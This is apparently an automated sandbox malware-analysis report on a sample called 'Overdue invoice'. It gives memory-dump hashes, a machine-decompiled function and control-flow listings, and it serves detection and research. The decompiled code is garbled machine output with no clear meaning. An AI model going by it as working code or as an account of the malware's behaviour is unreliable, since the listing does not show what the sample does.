• Instruction Fuzzy Hash: DD6138B4E2120ADFCB04CF9AD484AEEFBB1FB89310F109426D515A7310E3749A91CF91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e7175b83a71ad1a8c78335cd45d97b73de89f0277c51a7f1088f41339670ef8e
• Instruction ID: a01372739c4b66137a0fb61585f9e62cf071e684c19d60b6d06a6fba1921c4fb
• Opcode Fuzzy Hash: e7175b83a71ad1a8c78335cd45d97b73de89f0277c51a7f1088f41339670ef8e
• Instruction Fuzzy Hash: 2D71F4B4E25609CFCB04CFA9C9849DEFBF2FB89210F28942AD415B7354D7749A818F64
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ccbcb686004657e8204f1569474d004ec2d7fb9fb191fd4cefbca47e58238af1
• Instruction ID: 49a8a86e540267140a450a788d4731d98db5889580c82e1198552b3f437ee3c9
• Opcode Fuzzy Hash: ccbcb686004657e8204f1569474d004ec2d7fb9fb191fd4cefbca47e58238af1
• Instruction Fuzzy Hash: A66126B4E1520ADFDB05CFA5D4815AEBBB2FF89300F54942AD419B7344EB345A42CF91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 24778b694e1cf136114651662a2d29e686298e1c987b43a4899cbffc84ed1ba8
• Instruction ID: edcf1301591a11871b328610b3d200094e76c05b5d17b6ee0eec680415aeaad3
• Opcode Fuzzy Hash: 24778b694e1cf136114651662a2d29e686298e1c987b43a4899cbffc84ed1ba8
• Instruction Fuzzy Hash: 2F5126B4E1520ADFDB04CFAAD4805AEBBB2FF89300F54942AD419B7344EB345A42CF91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 084a602cc9d0303788ec2b9cecdd7bc8cad797bf0b00d37d6d7a6edfe043ad27
• Instruction ID: 9ce9a745591577378d45166403c4ff398edcb9ae6c9efff78bcbac48dd63815b
• Opcode Fuzzy Hash: 084a602cc9d0303788ec2b9cecdd7bc8cad797bf0b00d37d6d7a6edfe043ad27
• Instruction Fuzzy Hash: 126139B0E5162A8BDB68DF65C944799BBF2FF88300F1085EAD40DA7255EB705AC5CF40
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 75%
E005259ED(intOrPtr* __eax, signed int __ebx, void* __ecx, intOrPtr* __edx, void* __edi, signed int* __esi) {
    signed char _t13;
    signed int _t14;
    intOrPtr* _t16;
    signed char _t17;
    signed char _t18;
    intOrPtr* _t19;
    signed char _t20;
    signed char _t21;
    signed char _t22;
    signed char _t26;
    signed char _t29;
    intOrPtr* _t31;
    signed int _t32;
    signed char _t35;
    signed int _t36;
    intOrPtr* _t37;
    signed char _t40;
    signed char _t41;
    signed char _t43;
    signed int* _t50;
    signed int* _t51;
    signed int _t53;
    signed int* _t54;
    void* _t58;

    _t54 = __esi;
    _t36 = __ebx;
    _t53 = __edi + __esi;
    asm("adc eax, 0x1b000012");
    _t13 = __eax -  *__eax;
     *_t13 =  *_t13 + _t13;
    _push(ds);
    _t40 = __ecx +  *_t13;
    _t14 = _t13 &  *_t13;
     *__edx =  *__edx + _t40;
    _t50 = __edx -  *__ebx;
     *_t50 =  *_t50 ^ _t14;
     *__ebx =  *__ebx + _t14;
     *_t14 =  *_t14 + _t14;
     *_t14 =  *_t14 + _t50;
     *_t14 =  *_t14 + _t14;
    asm("adc [esi-0xa], edi");
     *_t14 =  *_t14 + _t14;
    _t41 = _t40 |  *(_t58 +  &(_t50[0x506c000]));
     *_t41 =  *_t41 + 1;
    _t16 = (_t14 |  *_t53) - 0xa;
     *((intOrPtr*)(_t16 + _t16)) =  *((intOrPtr*)(_t16 + _t16)) - _t41;
    do {
         *_t16 =  *_t16 + _t16;
        _t16 = _t16 -  *((intOrPtr*)(_t16 + 0xa0000f6));
    } while (_t16 <= 0);
     *_t16 =  *_t16 + _t16;
    _push(es);
    _t17 = _t16 -  *_t16;
    _push(ds);
    _t43 = (_t41 |  *_t50) +  *_t17;
    _t18 = _t17 &  *_t17;
     *_t50 =  *_t50 + _t43;
    _t51 = _t50 -  *__ebx;
     *__ebx =  *__ebx ^ _t18;
     *_t43 =  *_t43 + _t43;
     *_t18 =  *_t18 + _t18;
     *_t43 = _t51 +  *_t43;
     *_t18 =  *_t18 + _t18;
    asm("adc [edx], eax");
    if( *_t18 != 0) {
        L6:
        _t43 = _t43 -  *_t51;
        es = es;
        _t36 = _t36 ^ _t53;
        _t19 = _t18 -  *_t18;
         *_t19 =  *_t19 + _t19;
        asm("adc esi, [eax]");
        _t20 = _t19 +  *_t19;
        asm("sbb [eax], al");
         *_t20 =  *_t20 + _t20;
        _t21 = _t20 ^  *_t20;
         *_t43 = _t51 +  *_t43;
        goto L7;
    } else {
         *_t18 =  *_t18 + _t18;
        _push(es);
        _t29 = (_t18 + 0x0000000a |  *_t53) ^ 0x00000000;
         *_t43 =  *_t43 + _t29;
        _t21 = _t29 | 0x00000002;
        if(_t21 < 0) {
            L7:
            _t37 = _t36 +  *((intOrPtr*)(_t36 + 0x57));
             *_t21 =  *_t21 + _t21;
            _t22 = _t21 + 0xa;
            do {
                _push(es);
                _t22 = (_t22 |  *_t54) - 0xd +  *_t37;
            } while (_t22 >= 0);
             *_t22 =  *_t22 + _t22;
             *_t22 =  *_t22 + _t22;
            _pop(ss);
            asm("outsd");
             *_t22 = 0x28020600;
            asm("rol dword [eax], 0x0");
            _t43 = _t43 |  *(_t53 - 8) |  *_t51 |  *_t51;
             *_t37 =  *_t37 + _t51;
             *_t43 =  *_t43 ^ _t22;
             *((intOrPtr*)(_t22 + _t22)) =  *((intOrPtr*)(_t22 + _t22)) + _t43;
             *_t22 =  *_t22 + _t22;
            _pop(es);
             *_t22 =  *_t22 + _t22;
            asm("adc [ebx], eax");
            _t26 = (_t22 |  *_t54) - 6;
        } else {
             *_t21 =  *_t21 + _t21;
            _pop(es);
             *0xa2b0000 =  *0xa2b0000 - _t43;
            es = es;
            _t31 = _t21 + 8 -  *((intOrPtr*)(_t21 + 8));
             *_t31 =  *_t31 + _t31;
            asm("adc esi, [eax]");
            _t32 = _t31 +  *_t31;
             *_t32 =  *_t32 - _t32;
             *_t32 =  *_t32 + _t32;
             *_t32 =  *_t32 ^ _t32;
             *_t43 = _t51 +  *_t43;
            _t37 = (__ebx ^ _t53) +  *((intOrPtr*)((__ebx ^ _t53) + 0x57));
             *_t32 =  *_t32 + _t32;
            _push(es);
            _t54 = 0x740a0000;
            _t35 = (_t32 + 0x0000000a |  *_t53) ^ 0x00000000;
             *_t43 =  *_t43 + _t35;
            _t26 = _t35 | 0x00000002;
            if(_t26 >= 0) {
                 *_t26 =  *_t26 + _t26;
                _t18 = _t26 + 8;
                _pop(es);
                 *0xa2b0000 =  *0xa2b0000 - _t43;
                goto L6;
            }
        }
    }
    _push(es);
     *_t26 =  *_t26 + _t26;
    _push(es);
     *_t51 =  *_t51 ^ _t26;
     *((intOrPtr*)(_t43 +  *((intOrPtr*)(_t53 - 0x3e)) -  *_t37)) =  *((intOrPtr*)(_t43 +  *((intOrPtr*)(_t53 - 0x3e)) -  *_t37)) + _t51;
     *_t26 =  *_t26 + _t26;
     *_t26 =  *_t26 + _t26;
     *_t26 =  *_t26 + _t26;
     *_t51 =  *_t51 + _t26;
                                                                          				_push(ss);
                                                                          				asm("outsd");
                                                                          				 *_t26 = 0x7de0600;
                                                                          				return _t26;
                                                                          			}

                                                                          Instruction addresses for the listing above: 0x005259ed through 0x00525b0b (the address gutter of the decompiled function; 0x00000000 entries mark block exits)

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.297583913.0000000000522000.00000002.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                                                          • Associated: 00000000.00000002.297565297.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.297763203.00000000005BC000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.297784487.00000000005C6000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_520000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ec98a38b7c09de2341ab4310998a6920c41741008efb1729c61f2e812521ff9f
                                                                          • Instruction ID: be4cc43dd2aa66ccc233630ad3d5c48c582bacf4f34c1e8c5ba43e5dab7e9c41
                                                                          • Opcode Fuzzy Hash: ec98a38b7c09de2341ab4310998a6920c41741008efb1729c61f2e812521ff9f
                                                                          • Instruction Fuzzy Hash: AD51012140E7D15FCB134BB498B96D27FB1AF5B204B5E08C7C4C1CF0A3E529192AD722
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8dec995209762f9b7b926fcb3ab93b1b3a9c072c11602cad3ea83d591eaf2e86
                                                                          • Instruction ID: bd0378743c26a1df3ee77daee1645a9d71e18ee429b75690641d53bac3c67835
                                                                          • Opcode Fuzzy Hash: 8dec995209762f9b7b926fcb3ab93b1b3a9c072c11602cad3ea83d591eaf2e86
                                                                          • Instruction Fuzzy Hash: 8E416671E05249EFCB04CFE6D9406AEBBB6EB89300F10D82AD419BB264D7785A00CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c5bea245ed5d80a2a4368abdeda454c043aeab32874a0c68ef08be04c5ded72
                                                                          • Instruction ID: cf292f9b238bcd1f4d7112f35409cbc8b754657e877c8b2824f873cbfe4847a5
                                                                          • Opcode Fuzzy Hash: 9c5bea245ed5d80a2a4368abdeda454c043aeab32874a0c68ef08be04c5ded72
                                                                          • Instruction Fuzzy Hash: 63418675E05249DFCB04CFE9D9806AEBBF2EB89300F10D86AC419B7264E7785A05CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7757471365fa5b516c8779daedb23a9a5fe470fa6c5c36638317e7345a7173c
                                                                          • Instruction ID: 080bd20e354434bc3b3bb913841ff24923adf240029571a9dc47614a41030ee5
                                                                          • Opcode Fuzzy Hash: d7757471365fa5b516c8779daedb23a9a5fe470fa6c5c36638317e7345a7173c
                                                                          • Instruction Fuzzy Hash: 93417FB1E056588BDB19CF6B8D4539AFBF3BFC9300F14C1BA844CA6255DB3409858F51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 75be52cce964e4702e133192c68580de1bb0f2a69d927d3871356e666883f101
                                                                          • Instruction ID: b124d81a72977ce50470259b7a88c68160e35f9f42b736acf680d5499cd0929e
                                                                          • Opcode Fuzzy Hash: 75be52cce964e4702e133192c68580de1bb0f2a69d927d3871356e666883f101
                                                                          • Instruction Fuzzy Hash: 924171B1E116188BDB28CF6B8D4539EFBF7BFC8300F14C1BA854CA6254EB340A858E11
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00bd52ed50596be17770e2e04b8c3e5086370f199bb395a9cc0b996e5925dbb7
                                                                          • Instruction ID: 9c281ccfaf0e9c4d79cac2a1113a32e57dd6ff6cf428d82db6beac13913ab1cd
                                                                          • Opcode Fuzzy Hash: 00bd52ed50596be17770e2e04b8c3e5086370f199bb395a9cc0b996e5925dbb7
                                                                          • Instruction Fuzzy Hash: DB41F6B4E1520ADFDB04CFA9C5845EEFBF2BB89210F24C16AC405A7344E6345A828B55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93204a3f2396a6b1a83945025883cab8b839a921e4fdc8185d3990085fa1d1ba
                                                                          • Instruction ID: dfe274be3a7e39132e1c3d9bebeda7389638cd7a693e82025f1907979ac54d69
                                                                          • Opcode Fuzzy Hash: 93204a3f2396a6b1a83945025883cab8b839a921e4fdc8185d3990085fa1d1ba
                                                                          • Instruction Fuzzy Hash: A641E6B4E1520ADBCB04CFAAC5845AEFBF2AB89310F24C16AC415B7344E7349A818F95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c9024854c772112a5dcca9ef7ee4f3a1c376e48cfd0c43004f67f9233b108b65
                                                                          • Instruction ID: 864c6a58aeb5a098a98be3621a9725d5cdbb644a05b34cbe8f0b522343fa441e
                                                                          • Opcode Fuzzy Hash: c9024854c772112a5dcca9ef7ee4f3a1c376e48cfd0c43004f67f9233b108b65
                                                                          • Instruction Fuzzy Hash: 0041F8B0E1520A9FCB44CFAAC4845EEFBF2BF89300F14C16AC415A7254D7349A828F65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d1beae4a6f9ff40172290d3321ea4ed7f0cbc46b1570322a21ddf4a4d4737584
                                                                          • Instruction ID: ab001b219c977680256151dc1449cb1fd32fabba23d6987b730c4d366096ba52
                                                                          • Opcode Fuzzy Hash: d1beae4a6f9ff40172290d3321ea4ed7f0cbc46b1570322a21ddf4a4d4737584
                                                                          • Instruction Fuzzy Hash: C241C5B4E2020A9FCB04CFAAC5845EEFBF6BF88300F24C56AC415B7254E7749A818F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
• Opcode ID: f8a91cfdc3b1a30db813fe9a9e70b509410b005810c06e8824f86a4676b6bed6
• Instruction ID: 3af12eb0c96f6de019f2bf439139d6d205e7b67d5feba18f54479f2f763087c7
• Opcode Fuzzy Hash: f8a91cfdc3b1a30db813fe9a9e70b509410b005810c06e8824f86a4676b6bed6
• Instruction Fuzzy Hash: 073183B0E2121ACBDF18CF9AD9847DEF7B6FBC8200F51C4AAD509A7204DB314A818F51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ef78dd40a21881ebac483e99c382b6b29f07738f380aeaeb488f5dd93a3b242d
• Instruction ID: b85be091741536aa47324cbc71a90adf4a55ac238cfe85245210e81d6845aa08
• Opcode Fuzzy Hash: ef78dd40a21881ebac483e99c382b6b29f07738f380aeaeb488f5dd93a3b242d
• Instruction Fuzzy Hash: 7C2108B1E106189BEB18CFABDC44A9EFBF7AFC9200F14C1BAD408A7254DB305A418F51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b8be6424249d74fddecad7869619a486cee0a8a977e812ace6301a5975c67ec
• Instruction ID: 24de0982cdc416c2444fb3e733c72d6cb6a10ccc93aa67db808fba1b1d65ecdf
• Opcode Fuzzy Hash: 2b8be6424249d74fddecad7869619a486cee0a8a977e812ace6301a5975c67ec
• Instruction Fuzzy Hash: A211ECB1E106189BEB1CCFABD8446DEFAF7AFC8200F08C07AD808A6258EB3405418E51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d0783e792499e7b0990ed11a55246232c25e923b4dfc12ab4ed2226fd01c957a
• Instruction ID: 1e33546675c334030628f2f5df60060e8ed7b141a2d8d9ea0695499d359fa8c2
• Opcode Fuzzy Hash: d0783e792499e7b0990ed11a55246232c25e923b4dfc12ab4ed2226fd01c957a
• Instruction Fuzzy Hash: 0B11D0B1E116589BEB18CF6BD8447DEFAF3AFC8200F08C17AC808A6254EB3445428F11
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 20.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 285
Total number of Limit Nodes: 3
[execution_graph: rendered node/edge listing omitted. Root nodes at 64e60dc, 64e611d, 16d4560, 16dadf0 and 64e65e0; API calls reached in the graph: DeleteFileW, RtlEncodePointer, LoadLibraryA, KiUserExceptionDispatcher (the latter from a large fan-out of 64e74xx-64e81xx nodes converging on 64e8175).]
Memory Dump Source
• Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2da8ae200629f0203db4c90ae1ddcfa3e922fded071532ae981f2e5b57677302
• Instruction ID: caeed957685b5d8ec2414ff0f4c7be03bc73fff11f4ce4eddf57b8dc94092c5b
• Opcode Fuzzy Hash: 2da8ae200629f0203db4c90ae1ddcfa3e922fded071532ae981f2e5b57677302
• Instruction Fuzzy Hash: 38631D31D10B198ECB51EF69C984699F7B1FF99300F11C69AE459B7221EB70AAC4CF81
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15d619cb8fe0534b41a53436f842952377895c68c0dc2f72783e8feceade7aa6
• Instruction ID: a0deabec80582048e2d125890951fdc266a416dbcca6d54d15e4963c6a094a54
• Opcode Fuzzy Hash: 15d619cb8fe0534b41a53436f842952377895c68c0dc2f72783e8feceade7aa6
• Instruction Fuzzy Hash: F9428B30E002049FDB64EB75D898B6EB6E3EF85748F14C92DE4069B380DB75AD41CBA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

[control_flow_graph: basic-block listing for the function at 6c6a1c8 (blocks 6c6a1c8 through 6c6a418-6c6a422, one call to 6c65f38 from block 6c6a358); executed/not-executed edge colouring omitted.]
Strings
Memory Dump Source
• Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID: \$\$\
• API String ID: 0-3791832595
• Opcode ID: 9c475e0fe0f9058abea531b79e51544ea11623777bddcc805a68fe1d2a263b3b
• Instruction ID: 24defda6dbd8ea261bea52eb9ed5816d323041b77d29ff0d6af713caac961726
• Opcode Fuzzy Hash: 9c475e0fe0f9058abea531b79e51544ea11623777bddcc805a68fe1d2a263b3b
• Instruction Fuzzy Hash: E0519131B003108FDB649BB698D437E72A2AB84754F24953DE81AAB384EB75DC418794
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

[control_flow_graph: basic-block listing for the function at 64e7440 (blocks 64e7440 through 64e8175-64e81ad; calls into 6c65a60/6c65ac1, 6c66bf0/6c66c9e, 6c68ea3/6c68f00/6c68f5f/6c68efb/6c68e0b, 6c6914b/6c69158, 6c69657/6c69660, 6c69823/6c69828, 6c6a423/6c6a430/6c6a42b, 6c6a860/6c6a85b/6c6a8e9; block 64e7703-64e816e invokes KiUserExceptionDispatcher twice); executed/not-executed edge colouring omitted.]
APIs
• KiUserExceptionDispatcher.NTDLL ref: 064E7819
• KiUserExceptionDispatcher.NTDLL ref: 064E8156
Memory Dump Source
• Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: a513491f23dd7650423f95719837a44d56ea5f89338d91be69ab3f7cfe482d5b
• Instruction ID: 1ce3e7b571fe4b49dad41ab584309963d754d439fef0349693cc909b52cfe191
• Opcode Fuzzy Hash: a513491f23dd7650423f95719837a44d56ea5f89338d91be69ab3f7cfe482d5b
• Instruction Fuzzy Hash: E9020B39902398CFCB65DF20D8886A9B7B2FF4571AF6041EAE90A57340DB355E82CF51
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

[control_flow_graph: basic-block listing for the function at 64e7461 (blocks 64e7461 through 64e8175-64e81ad; same call targets as the 64e7440 function from 6c66bf0/6c66c9e onward; block 64e7703-64e816e invokes KiUserExceptionDispatcher twice); executed/not-executed edge colouring omitted.]
APIs
• KiUserExceptionDispatcher.NTDLL ref: 064E7819
• KiUserExceptionDispatcher.NTDLL ref: 064E8156
Memory Dump Source
• Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 717d5e0e8fa56d3f9c90228b54d76a09d84458f26e867eab00b537a55c5afad5
• Instruction ID: edc705339c6de9102205074522ea5a851df8ebaf2d141fcdfb7e750568efd36d
• Opcode Fuzzy Hash: 717d5e0e8fa56d3f9c90228b54d76a09d84458f26e867eab00b537a55c5afad5
• Instruction Fuzzy Hash: 9F020B39902258CFDB65DF20D8886A9B7B2FF4570AF6041EAE90A57340DB355E81CF51
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

[control_flow_graph: basic-block listing for the function at 64e74a8 (blocks 64e74a8 through 64e8175-64e81ad; calls into 6c68ea3/6c68f00/6c68f5f/6c68efb/6c68e0b, 6c6914b/6c69158, 6c69657/6c69660, 6c69823/6c69828, 6c6a423/6c6a430/6c6a42b, 6c6a860/6c6a85b/6c6a8e9; block 64e7703-64e816e invokes KiUserExceptionDispatcher twice); executed/not-executed edge colouring omitted.]
APIs
• KiUserExceptionDispatcher.NTDLL ref: 064E7819
• KiUserExceptionDispatcher.NTDLL ref: 064E8156
Memory Dump Source
• Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 72defcb839cbb1e6dd4b2fae1b49c49245f9014c33208b49eae7a51ab3eb6c31
• Instruction ID: 2bcb68187d79025374ad451ea2a005353719e519735498074fb453c4608b4619
• Opcode Fuzzy Hash: 72defcb839cbb1e6dd4b2fae1b49c49245f9014c33208b49eae7a51ab3eb6c31
• Instruction Fuzzy Hash: 5B021B39902398CFCB65DF20D8886A9B7B2FF4571AF6041EAE90A57340DB359E81CF51
Uniqueness
Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 542 64e74ef-64e7515 690 64e7515 call 6c68ea3 542->690 691 64e7515 call 6c68f00 542->691 692 64e7515 call 6c68f5f 542->692 693 64e7515 call 6c68efb 542->693 694 64e7515 call 6c68e0b 542->694 546 64e751b-64e759a 695 64e759a call 6c6914b 546->695 696 64e759a call 6c69158 546->696 552 64e75a0-64e7628 680 64e7628 call 6c69657 552->680 681 64e7628 call 6c69660 552->681 558 64e762e-64e766f 682 64e766f call 6c69823 558->682 683 64e766f call 6c69828 558->683 561 64e7675-64e76b6 684 64e76b6 call 6c6a423 561->684 685 64e76b6 call 6c6a430 561->685 686 64e76b6 call 6c6a42b 561->686 564 64e76bc-64e76fd 687 64e76fd call 6c6a860 564->687 688 64e76fd call 6c6a85b 564->688 689 64e76fd call 6c6a8e9 564->689 567 64e7703-64e816e KiUserExceptionDispatcher * 2 678 64e8175-64e81ad 567->678 680->558 681->558 682->561 683->561 684->564 685->564 686->564 687->567 688->567 689->567 690->546 691->546 692->546 693->546 694->546 695->552 696->552
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 9d7dd3a93a1b03cf1b2134357489961e29b07c2df88386aa4d112b802d0cdcae
                                                                          • Instruction ID: f506ed393bf345b1cf2802633fa948518424e4e68be9abc3f637fc56a28b1652
                                                                          • Opcode Fuzzy Hash: 9d7dd3a93a1b03cf1b2134357489961e29b07c2df88386aa4d112b802d0cdcae
                                                                          • Instruction Fuzzy Hash: E2021B39902298CFCB65DF20D8886A9B7B2FF4571AF6041DAE90A57340DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
